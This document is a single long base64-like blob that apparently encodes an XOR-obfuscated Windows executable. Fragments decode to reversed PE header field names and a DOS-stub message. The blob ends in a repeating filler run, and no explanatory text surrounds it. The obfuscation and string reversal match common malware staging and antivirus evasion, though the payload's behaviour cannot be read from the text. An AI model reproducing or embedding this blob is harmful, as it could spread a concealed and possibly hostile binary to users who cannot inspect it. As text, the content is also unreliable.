rt4vrBj/zo7uPJ/err7uDDj/vm4uLgzP/u6sfpwOr15tyP6vn96vzq3f/u6sfpwOr15tyP++bi4uDM5Ozu+9zpwOr15tyP6vn96vzq3eTs7vvc6cDq9ebcj/zs5vv85v3q++zu/e7nzOPjy4/i6vv89vzt+tyP4vrc5Ozq58yP/P3q6+7qx+nA6vXm3I/q6O7ixunA6vXm3I/q+uPu2eHg5vz96tm9vOHm2I/h4Ob8/erZ4ur7/Pb87frc/eDh5sKP4eDm/P3q2eLq+/z2/O363P3g5e7Cj+Hg5vz96tnq6O7ixv3g4ebCj+Hg5vz96tnq6O7ixv3g5e7Cj+Hg5vz96tni6vv89tzo4eb77v3q/8D94OHmwo/h4Ob8/erZ4ur7/Pbc6OHm++796v/A/eDl7sKP++Hq4uHo5uPO6uPmyY/74eri4ejm487h4Ob77Orcj+r87s3q6O7ixo/u++7L6cDq/O7Nj+rr4MzpwOr87s2P++Hm4N/2/fvhyunA/Pzq/evrzo/u++7L6+r15uPu5vvm4ebh2unA6vXm3I/u++7L6+r15uPu5vvm4cbpwOr15tyP6uvgzOnA6vXm3I/h4Ob8/erZ/erk4ebD/eDh5sKP4eDm/P3q2f3q5OHmw/3g5e7Cj+zm6O7Cj/3q6+7qx+Pu4eDm+//Aj/3q6+7qx+rj5smP6v36++7h6Obcj/zs5vv85v3q++zu/e7nzI/96uvu6sfj7uHg5vv/wOnA6vXm3I/84+Dt4vbc6cD96u3i+sGP6uPt7tvj4O3i9tzg2/3q++Hm4N+P/+Lu+9zq++7L6uLm24/84eDm++zq3OnA/ert4vrBj+rh5ufs7sKP+Orh7unj0OqPvfzq/dDqj+Dp4ebi6uDQ6o/r5uLq4NDqj7786v3Q6o/g4fng0OqP7OP97unj0OqP/OzQ6o//5tDqj+L6/OzQ6o///NDqj/z80OqP7ODj4+737uLQ6o/s4OPj7uHm4tDqj/3r5/3u/+zQ6o/s4/3s0OqP/+zQ6o//4+3s0OqP7Obo7uLQ6o/q9ebcj/z86v3r687j7vr7/ebZj+r77vvc9//Bv/3Mj+7q/c796vv85ujq3Y/94Pvs6uPq3O777suP++r86enA7vvuy4/94Pvs6uPq3P3g/f3Kj/vq/OnpwP3g/f3Kj+v94Njo7tuP6/3g2Pz6++773I/r/eDY4+D9++HgzI/8/er7/Obo6t3r6uvh6vv3yo/83Ojq3I///MqP/Oju48nKj/zM6Orcj//myo//7cqP9+7Kj/fsyo/368qP9+3Kj+b8yo/m68qP/Mvo6tyP/Mro6tyP/Mno6tyP/Mjo6tyP6vnu3Pvu4OPJj7j9y4+5/cuPvP3Lj739y4++/cuPv/3Lj/zo7uPJ+/fq++HgzI/94PvsoY/r7ur959vq4vr86t2P4eDm++zq3OnA+Orm2f/u4uHa+8GP/Pzq7OD93+Hg5vvu4v3g6eHG++rc+8GP9v3g4urC/Pzq7OD93+r75v3Yj/v36vvh4Mzr7ur959v76ty7ufjg2I/79+r74eDM6+7q/efb++rIu7n44NiP98r77Or74P3f4+76+/3m2Y/3yuzg4+PO4+76+/3m2Y/8/Ors4P3f6vvu4ebi/erbj/v36vvh4Mzr7ur959v76tyP9vvm/frs6tz77Orl7cDj6uH96sT76tyP/Pzq7OD93+r77ur9zI/79+r74eDM6+7q/efb++rIj/z86v3r687s4P3f++rIj+Xhxo/q//bb6vrj7tmP++zq5e3Aj+Lq+/z23I/t5uP94Oz84o/BwMbbzsLdwMnBxtDc3MrMwN3fj93Ky87Kx9DBwMbbzMrc0MrIzsLGj7283crLzsrH0MPOwcDG29/A0MrIzsLGj9zdysvOysfQ28HQysjOwsaP3crLzsrH0MrDxsnQysjOwsaP3crLzsrH0NzAy9DKyM7Cxo/W3cDbzMrdxsvQztvOy9DKyM7Cxo/Oyt3O0MrZztzQyMHG287Aw8mP29fK28HAzI/t5sP96vv/9v3M686P4frdj+Pj66Ht5sP96vv/9v3M686Pserj+uvgwrOPj4+Pj4+Nj4SPjY+Fj42Pho+Nj4ePjY+Ij42PiY+Nj4qPjY+Lj42PjI+Pj4+PXo+Oj4+Pj4+Pj4+Pj4+Nj4+PkI+Pj4+Pj4+Pj4+Pj4+Oj48Pi4+OjmWPkI6Pj4yOWo+Sjo+PjI4yj5SOz4+OjiWPlo7Pj46OG4+Yjo+Pjo7xj5qOj4+OjuKPnI6Pj46O0Y+ejs6Pjo7Cj4COz4+OjrOPgo6Pj42Oq4+Ejs+Pjo6Zj4aOj4+OjoqPiI6Pj46PeY+KjsyDx4O0g6GOlo7Aj02Ow49PjsaP447Jj+mOzI/NjrCPvY8tj6KNmY8cj6GNgo8Ej6GNi48Mj6GOeI/0j6GOQo/kj6GOFo/sj6GOFo/cj6GOOo/Ej6GO3Y/Mj6GOEI+0j6GOFo+8j6GO64+kj6GO3Y+sj6GOt454jqaP/454j4aPK454jq6OnIOHjp6OgYR9joaOhoRBj26Oi4Rsj3aOj4RVj26P6oVvj26PdI54j26PeYRBj26PFoRLj26PYIQ6j3aPZ4QUj2aPO454j26Pa4Tzj26Pb4Ttj16PV4TTj16PXYSwjzaPQoSnj0aPR4ScjzaPS4SJj06PMIV6j06PNoVvjzaP/454jz6PO454jyaPIY54jxaPK454jx6PK454jwaPK454jw6PJo54j/aPK454j/6PK454j+aPK454j+6PK454j9aPK454j96PK454j8aPK454j86PK454j7aPE454j6aP/454j66P/454j5aJTY+Oj4+HAI+Nj4+JNo+Oj4+HYY+Lj4+HVI+Mj4+HTI+Nj4+JNo+Oj4+HI4+Kj42HKY+Lj4+HEo+Mj4+HAI+Nj4+JNo+Oj4+Ij4+Nj46JTY+Oj4+Ij4+Nj4+JTY+Oj4+HD4+Kj42H/I+Lj4+H3o+Mj4+HyI+Nj4+JNo+Oj4+H5o+Kj4+H14+Lj4+H3o+Mj4+HyI+Nj4+JNo+Oj4+Hso+Nj4+JNo+Oj4+Pj4+Pr4+Ij4+Nj46JTY+Oj4+Ic4+Mj46IZ4+Nj4+Ibo+Oj4+IL4+Fj42IHY+Gj4+I8I+Hj4+I/o+Ij4+I7o+Jj4+I3o+Kj4+IsY+Lj4+IpY+Mj4+Ik4+Nj4+IhY+Oj4+Ij4+Nj4+JTY+Oj4+JeI+Nj4+JYI+Oj4+JaY+Nj4+Jbo+Oj4+PvI//jniXCY+Pj4+r44+9j+SOZa8ejw+Pj4+Pj7+P6o5arx6PD4+Pj4+Po4/TjjKvHo8Pj4+Pj4+oj96OJa8ejw+Pj4+Pj6qPmI4brx6PD4+Pj4+PrI+YjvGvHo8Pj4+Pj4+Rj8iO4q8ejw+Pj4+Pj5aPsY7Rrx6PD4+Pj4+PmY+3jsKvHo8Pj4+Pj4+bj5iOs68ejw+Pj4+Pj56Pv46rrx6PD4+Pj4+PiI+QjpmvHo8Pj4+Pj4+Kj5iOiq8ejw+Pj4+Pj4yPno95rx6PD4+Pj4+Pjo+Fj32PGY+Pj4+v348JiVmPiY8JiUWPiY8WiU2PiY8WiTaPiY/7jHSPiY/wiSqPiY/wiR6PiY/7ifOPiY/7ieiPiY/7idmPiY/7icePiY/7jXiPiY/7ibOPiY/0ibifiY8biaafiY/7iZqPiY/7iYaPiY/7inePiY/7immPiY/7iluPiY/7ik6PiY/wiiGPiY/wiiuPiY/7ihSPiY/7igKPiY/7ig6PiY/7iuCPiY/witaPiY/wisyPiY/wir6PiY/wipCPiY/wioyPiY/wi2iPiY/7i1aPiY/7i0ePiY/7izGPiY/7izyPiY/7iyePiY/7ixuPiY/7i/OPiY/7i+mPiY/7i9SPiY8ei8ePiY8ei7qPiY/wi6CPiY8Ci6+PiY8Gi5qPiY/7i4SPiY/wjHSPiY/wjGmPiY/7jFmPiY/7jE6PiY/7jDyPiY/wjC2PiY/wjBWPiY8JjB6PiY8NjAWfiY/wjA+PiY/wjPePiY8NjP6fiY/wjOWPiY/wjO6PiY/wjNOPiY/wjNiPiY/wjN+PiY/wjMSPiY/wjMmPiY/wjLSPiY/wjL+PiY/wjKmPiY/wjJCPiY/wjJWPiY/wjJyPiY/wjISPiY/7jImPiY/7jXiPiY/7jWSPiY/0jVGfiY/7jV6PiY/7jUmPiY/7jTePiY/7jSOPiY/7jSuPiY/7jRaPiY/7jQKPiY/0jfSfiY/7jfqPiY/7jf6PiY/7jeWPiY/7jeuPiY/7je+PiY/7jdOPiY/7jdePiY/7jduPiY/7jd+PiY/7jcOPiY/7jcePiY/7jcuPiY/7jbGPiY/7jbePiY/7jb2PiY/7jaOPiY/4ja2PiY/7jZGPiY/7jZWPiY/7jZmPiY/7jZ2PiY/7jYGPiY/7jYWPiY/7jnKPiY+ej+SPho+PjzKPn46Cj56P7o+Gj4+PJ4+fjoSPno/Nj4aPj48fj5+OhI+ej7CPho+Pj/CPn46Ej56Pt4+Gj4+P4o+fjoSPno+qj4aPj4/Tj5+OhI+ej6yPho+Pj8iPn46Ej56PlY+Gj4+Pu4+fjoSPno+Oj4aPj4+jj5+OhI+Oj46Pio+Qj5SPn4+Oj46Pjo+Pj4+Pjo+Pj4+IOoPnj4mIOoPdj4mIOoOUj4mPVYOej4mPVYR0j4mPVYRlj4mPVYRGj4mIOoQij4mPVYQGj4mPVYQLj4mPVYT6j4mIOoTAj4mIOoTJj4mPVYSTj4mGiIVjj4mPVYVWj4mF9IU0j4mF9IUUj4mPj4Xjj8CFyoXXj4mGiIWnj4mGiIWAj4mIOoWOj4mIOoZij4mGiIZbj4mGiIY2j4mGiIYRj4mGiIYKj4mGiIbjj4mGiIbCj4mGiIa/j4mGiIaWj4mIOoegj4mIOoeTj4mIOoefj4mIOohbj4mPVY9nj4mPVY9uj4mPj4+Pj46PhY+Pj4+Pho+Pj46Pj4+Oj4+PgY+Pj4yPj4+Oj4+PiI+Pj4KPj4+lj4+PvY+Pj5+Pj4/hj4+PhI+Pj6mPj4+Oj4+Zj7yqdY+Pj42Gm4262I6Pj42Pj4+Pj4+P7eDjzayPj423j4+Z14+Pj8vG2sisj4+Pn4+PmceP3Nqsj4+PM4+PmgOPj4+P/Ojh5v373KyPj4P7j4+Gl4+P8ayPj4cjj4+P44+Kj4+Pj7i9uL+6ob+hvfmPj4+Dj4+Pj4+Oj47NxdzNpYWPj6anjZGOj4+sj4+PiY+PjGaPj4xnj4+Pjo+Pj4+Pj5POj4+PpY+PUY+PgZyJUY+piY+PgKeLj4/j9IidgpyLj4/i9Iidj6mJj4+Ep4ydi4+P4/SInY+epI+piY+PiaeMnYuPj+P0iJ2PnKKAnoCcjnGZjnGVhY+PrKeLj4+d8teLj4/H9IuPj87zip2Lj4/E9IuPj87zip2MnamJj4+Dp46d5gGDnoOehY+Prvzh15GLj4+A9Iydi4+P5PSInYOchY+PqKeLj4/E9IuPj87zip1wcHFotYCegJyLcYuPj7b0i4+Pz/OKnYeeh5zXmIeej6mJj4+Gp4adz5CLj4/t9ImdhY+Prvzh14uPj+z0iZ2Lj4/E9IuPj87zip2Lj4/k9IidqYmPj4Onjp2Fj4+pp4uPj+v0iZ2FnoWPj6784deLj4/s9Imdi4+PxPSLj4/O84qdi4+P5PSInUeigJ6AnItx4YuPj+v0iZ3lhJ6EnNeYhJ6PEx6Fj4+qp4WPj6+n1+WEnuGLj4/q9ImdjYSehZ6PqqSEnJmFnI6Pj68Cb9eYi4+P6/SJnYmcjY+PhSqFj4+Rp4WPj5KnjY+PhV+Fj4+T/NfVhY+Pq6eNj4+FA4meh57XhY+Pq6eNj4+HA4qe14uPj7j0i52Hj4+Pjo+3h5yZqYmPj4Onjp2Lj4/Z9IuPj87zip2NhY+Prvzhi4+PxPSLj4/O84qdi4+P5PSInY+piY+PhaeMnYuPj+P0iJ2PnqSPqYmPj4ynjJ2Lj4/j9Iidj5yigJ6AnI5xmY5xlYWPj6yni4+PjvKPjo+Ir4ydj4+Jj4+Op4yNqYmPj4inmYuPj+T0iJ2Pl6KAnoCcjnGZhY+PraeFj4+Q8YmPj4enz5CPj7+Pr4uPj9r0i4+PzvOKnYWPj6784YuPj8T0i4+PzvOKnYuPj+T0iJ2piY+PgaeFj4+vp+GLj4/E9IuPj87zip2Lj4/k9IidqYmPj4uniJ2Oj4+vAsuQm4WPj5DxlZmFj4+Q8YWPj5DxiYyKnI2Pj4cqhY+PkaeFj4+Sp42Pj4dfhY+Pk/zXi4+PuPSLnYeLnI2Pj4kqhY+PkaeFj4+Sp42Pj4lfhY+Pk/yHjY+PhJpxiJ2Nj4+FmnGJnY2Pj4eacYqdjY+PiZpxi52Nj4+MmnGMnYOFj4+Up56dnpyFj4+Vp5+dn5yFj4+Wp5aNjp+Fj4+a4IWPj5ung6SPjp+Fj4+Xp/+Pj+z9hY+PmKf/j4+u/Y+VooCegJyOcZmFj4+Z4P+Pj9T9jLWkj46fhY+Pl6f/j4+g/YWPj5in/4+Prv2PlaKAnoCcjnGZhY+PmeD/j4+e/YznpI+On4WPj5rghY+Pm6ePn6KAnoCcjnGZhY+PnKf/j4+M/YyF/4+Pjv2Pj56Pj46Pj4x+j4W/lI+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Mj4+XH4+Pq/uPio+Nj4+Px4+Pj4+Pj7H/j4+Pj4+Pj4+Pj4+Pj4+Pj82Pj8+Pj4+Pj4+Pj4+Pj4+Pj6mPj4+Nj4+P74+Pj4+Dj4/s4OPq/aHPj4/Pj4+Pj4+Pj4+Pj4+Pj4+tj4+Pi4+Pj8+Pj4+MZ4+Pj+z9/P2h74+Pr4+Pj4+Pj4+Pj4+Pj4+PjY+Pj6+Pj4+vj4+PkRuPj4/79+r7oY+Pj4+Pj4+Pj4+Px4+Pr4ePj4+Pj4+Pj4+Pj4ePj6+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj5OPj7KLj4+Pg4+P74+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+MZ4+Pz4+Pj4/Aj4+xs4+Pj4+Pj4+Pj4+Pn4+Pj4+Pj5+Pj5+Pj4+Pn4+Pn4+PCs+PjI+Pj4+Pj42Pj48Pj4+Pj4+Pj4+Lj4+Pj4+Pj4uPj42Pj4+vj5+Pj4+Pj8+Pj4+vj4+PsQGPj4+Pj4+Jj4+Pr4+PhI6Ero2Pb4+Pj4+Pj4+P2pP+zI+MjsOPj8rfj4+Pj4+Pj6uFgoKh6uvg4q/cwMuv4eav4fr9r+rtr/vg4eHu7K/i7v3o4P3/r/zm59uuQsOON65ChjuPgTWQgY+Pjw+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj8+Pj4+Pj4+PN4+PcHCPj4+Lj4+PjI8f1cKPj6ePr4+Pj4+P7Y/mj8OP/Y/qj/uP/4/2j/2PzI/rj86Xj4+PVo+Pj4+VQhaz38vO38vO34+Pj4+Pj4+Oj4+Pjfvq3Ors/frg/Ord6uLm++H63aH86uz9+uD86t2h4ur7/PbcrLa3v+q7vLa+ubrsuu64uO2y4erk4Nv26sTs5uPt+t+vo+Pu/fv66uGy6v36++P6zK+jv6G/ob+hvbLh4Ob8/erZr6Pt5uP94Oz84q+j/err7urd6uz9+uD86t2h/Ors/frg/OrdoeLq+/z23OOPj48ej4+PjjFgRUGPj6dRpYmPpIWJj4+jp4+ej4+Vj4+PhI+Ov5yPpYmPpIWLj49N8Y+ej4+Wj4+PhI+Ov5yPj6WPj4WPj+2njamPpY+Lj49ND42Pj5X7hY+P7qeJj4+k/NWPj6WJj6SFlI+PhfuIhIWPj56nhY+P0OCLj49O8f+PjyL9iY+PqaePno+Pl4+Pj6mPjL+cj4+lj4uPj04PjY+pj6WJj6SFi4+PTvGPno+PmI+Pj4SPjr+cj6WJj6SFi4+PT/GPi4+PTw+IhIWPj9H8hY+P0uCFj4/cp42Pj5Zf/4+PHP2vo4eDhY+P06ebi4+PT/GPno+PmY+Pj7SPjb+cj4+lj4WPj9jyhY+P1fyNj4WPj46njY/ZpYmPpIWIj4+Fj4/W4IiFj4/Y9I2EpI+Pjaeco4aCjnGblI+PjAOIhIWPj9fghY+P2PSNj56Pj5qPj4+7j42/nI+lj4+Fj4+Op42PpY+PpY+Uj4+NDomUj4+NmnGPnYyPno+Pm4+Pj52Pjb+cpYmPjqSFjY+KpIekhaSPj46nhaOIhI5xm5SPj44DjY+ej4+cj4+Pr4+Nv5yliY+khYWPj9unjY+ej4+dj4+Pg4+Ov5yliY+khYWPj9ynjY+Pil+Pno+Pno+Pj5+Pjr+cpYmPpIWFj4/dp42Pno+Pn4+Pj4OPjr+cj4+liY+khYWPj96nhY+PnqeMjY+ej4+Aj4+PnY+Nv5yliY+khY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zgiY+Pi6eYhJ6PLf+PjwD9mYSehJyOj4+VApQVhpCJip6KnIWPj5PgmP+Pj7z9hY+PlPGPj4WPj5WnhY+PmacVkYn/j4+g/YWPj5rghY+Pm+CFj4+c4ImPj4unhY+PjaePj4+POreKo4KegpyFj4+Wp4WPj5mnFZGJ/4+PoP2Fj4+a4IWPj5vghY+PnOCJj4+Lp4+Pj2i2g56DnI5xmYWPj4inmf+Pj5r9FZKJj4+OpKmFj4+Xp4WPj5mnFZOJ/4+PoP2Fj4+a4IWPj5vghY+PnOCJj4+Lp4+Fj4+Yp4uehY+PmacVk4n/j4+g/YWPj5rghY+Pm+CFj4+c4ImPj4uni5yFj4+KpxWUidOjg56DnI5xmYWPj4inmf+Pj5r9FZWJD6KDnoOci3E4AYaeh56Ph5xZmIeej6mFj4+d4IWejy0VlomYhZ6PLYiZhZ6FnI6Pj4wCl4WPj56nhY+Pn6eGm4WPj4CnhY+PgaeFj4+Cp4+Pjo+vhY+PgqeZ/4+PqP2GxaODnoOcjnGZhY+PiKeZ/4+PkP2Fj4+D4IaCFYeehp79pIecmYachY+PhOCFj4+F4ImPj6anhY+PhqePj4WPj4enV4+PjGevh4Kjg56DnI5xmYWPj4inmf+Pj5r9FYWQiamFj4+Jp42dFYSQiYSJj4+bp/+Pj4T9hY+PiqcVl4mFhY+Pi6eZmv+Pj479hY+PjKeFj4+Np4+Pno+Pjo+PjRSPhr+Uj4+PpY+PiY+PnaePhY+PjqeNj82Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+nbY+PoKSPj4+Pj4+PjI+Pu5OPj9efj4qPjY+Pj8ePj4+Pj48D74+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+PzY+Pz4+Pj4+Pj4+Pj4+Pj4+PK4+Pj42Pj46Pj4+Pj4OPj+zg4+r9oc+Pj8+Pj4+Pj4+Pj4+Pj4+Pj/uPj4+/j4+PT4+Pj6D3j4+P7P38/aFPj4/Pj4+Pj4+Pj4+Pj4+Pj4/9j4+PjY+Pjy+Pj4+Ot4+P7vvu6/yh74+Pr4+Pj4+Pj4+Pj4+Pj4+Pi4+Pj+GPj4+vj4+P4wuPj4/79+r7oY+Pj4+Pj4+Pj4+Px4+Pr4ePj4+Pj4+Pj4+Pj4ePj6+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj5OPjy+Pj4+Pg4+Oj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+g94+PT4+Pj4/Aj48Do4+Pj4+Pj4+Pj4+Pn4+Pj4+Pj5+Pj5+Pj4+Pn4+Pn4+PCs+PjY+Pj4+Pj4uPj46vj4+Pj4+Pj4+Lj4+Pj4+Pj4uPj42Pj4+vj4/Pj4+Pjy+Pj4+vj4+PA/GPj4+Pj4+7j4+P4Y+PhI6Ero2Pb4+Pj4+Pj4+P2ujFj4+LjsOPj8rfj4+Pj4+Pj6uFgoKh6uvg4q/cwMuv4eav4fr9r+rtr/vg4eHu7K/i7v3o4P3/r/zm59uuQsOON65ChjuPgTWQgY+Pjw+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj8+Pj4+Pj4+PN4+PcHCPj4+Lj4+PjI8f1cI=proxcRoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGho